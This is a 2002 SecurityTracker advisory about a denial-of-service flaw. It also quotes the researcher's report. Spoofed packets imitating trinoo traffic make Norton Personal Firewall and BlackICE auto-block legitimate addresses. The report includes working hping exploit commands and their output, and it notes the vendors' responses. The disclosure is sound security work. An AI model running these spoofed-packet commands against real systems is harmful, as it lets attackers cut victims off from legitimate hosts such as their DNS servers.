SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Firewall)  >   Norton Personal Firewall Vendors:   Symantec
Symantec's Norton Personal Firewall Lets Remote Users Cause the Firewall to Block Valid Packets
SecurityTracker Alert ID:  1005391
SecurityTracker URL:  http://securitytracker.com/id/1005391
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Oct 9 2002
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): 2002 (version 4.0)
Description:   A denial of service vulnerability was reported in Symantec's Norton Personal Firewall software. A remote user can send packets to cause the firewall to block legitimate packets.

It is reported that a remote user can send a specially crafted packet using a spoofed source address to cause the firewall to block legitimate connections from the spoofed address. The specially crafted packet must appear similar to one of several well-known attack packets (e.g., trinoo). According to the report, the firewall will block all packets originating from the valid address after receiving the spoofed packet.

A demonstration exploit command using the hping utility (http://www.hping.org/) is provided:

hping -p 31335 -e PONG -2 ip.add.of.victim -c 5 -d 4 -a ip.add.of.server.to.be.blocked

The vendor has reportedly been notified.

Impact:   A remote user can cause legitimate packets to be denied by the firewall software.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.symantec.com/sabu/nis/npf/ (Links to External Site)
Cause:   State error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Multiple Vendor PC firewall remote denial of services Vulnerability


Overview
In a default installation, some personal firewall software will work
with auto-block function on, and this time if you fake a high level
dangerous attack packet with spoof address target these pc, these
firewall will immediately block the spoofed ip address without any
further judgement. Thus, an intruders might quickly block quite a great
internet address for a victim pc remotely.

Example

Below are the steps and result of the test on BlackICE,

step 1:A clean and DEFAULT installation of  blackice defender for
server(version 2.9.cap) on a win2k server  
pc,which ip address is ip.add.of.victim

step 2:On a linux box with hping (a free soft can get from
www.hping.org) installed,perform the following three  
commands:
---
[root@]# hping -p 31335 -e PONG -2 ip.add.of.victim -c 5 -d 4 -a ip.add.
of.dnsserver
HPING ip.add.of.victim (eth0 ip.add.of.victim): udp mode set, 28 headers
+ 4 data bytes

--- ip.add.of.victim hping statistic ---
5 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
[root@]# hping -p 31335 -e PONG -2 ip.add.of.victim -c 5 -d 4 -a
www.google.com
HPING ip.add.of.victim (eth0 ip.add.of.victim): udp mode set, 28 headers
+ 4 data bytes

--- ip.add.of.victim hping statistic ---
5 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
[root@]# hping -p 31335 -e PONG -2 ip.add.of.victim -c 5 -d 4 -a
www.networkice.com
HPING ip.add.of.victim (eth0 ip.add.of.victim): udp mode set, 28 headers
+ 4 data bytes

--- ip.add.of.victim hping statistic ---
5 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
---
These three commands all do the same thing:send fake trinoo
communication udp packet to our target machine  
ip.add.of.victim with spoofed ip adress. ( google,networkeice,and
ip.add.of.dnsserver-our dns server)

result:Each time the command executed,the blackice icon on the windows
system tray flash,and an entries added   
in blackice 's Advanced Frirewall Settings automatically whick block all
the packet of the spoofed  
address.And the spoofed ip address is unreachable immediately.

The test steps and result of Norton personal firewall are almost the
same, using  hping -e 13 -d 2 -s 6000 -p 2140 -2 ip.of.remote.victimpc
-c 2 -a ip.of.spoofed.address instead.

Vendor Response
2002, Symantec told me they have forwarded my concerns on to the
appropriate team, and BlackIce reply me As the product exists now, there
is nothing that can be done to correct this.  And they are in the hopes
that something can be done in a future release.

Affected Versions:
--
I have test the following product

BlackICE Defender for server version 2.9.cap
BlackICE Server Protection version 3.5.cdf
Norton personal firewall 2002 (version 4.0)
All are vulnerable.



 
 
-- 



Yiming Gong 
Senior System Administrator 
China Netcom
yiming@security.zz.ha.cn 
http://security.zz.ha.cn 
0086-371-7934907 



 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2022, SecurityGlobal.net LLC